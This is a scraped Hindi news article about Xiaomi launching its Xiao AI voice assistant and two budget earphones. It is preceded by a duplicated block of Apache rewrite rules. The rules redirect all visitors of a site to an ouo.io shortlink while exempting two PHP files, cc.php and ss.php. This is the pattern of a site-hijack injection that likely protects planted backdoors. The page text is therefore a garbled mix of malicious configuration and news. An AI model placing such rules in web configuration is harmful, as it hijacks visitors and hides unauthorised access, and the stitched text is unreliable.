
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 563
Previous Nextनई दिल्ली। तो आपके सामने जल्द आ रहा है शियोमी का Xiao AI, जो कि आपकी हर बात को मानेगा। इसके अलावा कहा जा रहा है कि इसके सामने एप्पल की सीरी,गूगल असिस्टेंड और सैमसंग के बिक्सबी भी नहीं टिकने वाले। शियोमी ने आर्टिफिशियल इंटेलिजेंस बेस्ड वर्चुअल वॉयस ऐसिस्टेंट सर्विस Xiao AI लॉन्च कर दिया है। कंपनी के मुताबिक कंपनी के लेटेस्ट स्मार्टफोन Mi Mix 2S में वॉयस असिस्टेंट Xiao AI दिया जाएगा। Xiaomi ने एक वीडियो जारी किया है, जिसमें इस पर्सनल असिस्टेंट के बारे में बताया गया है। AI बेस्ड ये असिस्टेंट आपके कमांड्स पर काम करेगा। असिस्टेंट से मौसम का हाल, लोकेशन और आसपास खाने के लिए क्या है जैसे सवाल पूछ सकते हैं। कहा जा रहा है कि शियोमी के स्मार्ट होम डिवाइस के लिए इस असिस्टेंट में इसका सपोर्ट दिया गया है। इससे पहले शियोमी दो नए बजट ईयरफोन्स, Mi Earphones Basic और Mi Earphones को भारत में लॉन्च किया है। Mi ईयरफोन बेसिक की कीमत 399 रुपये रखी गई है। Mi ईयरफोन्स की कीमत 699 रुपये रखी गई है।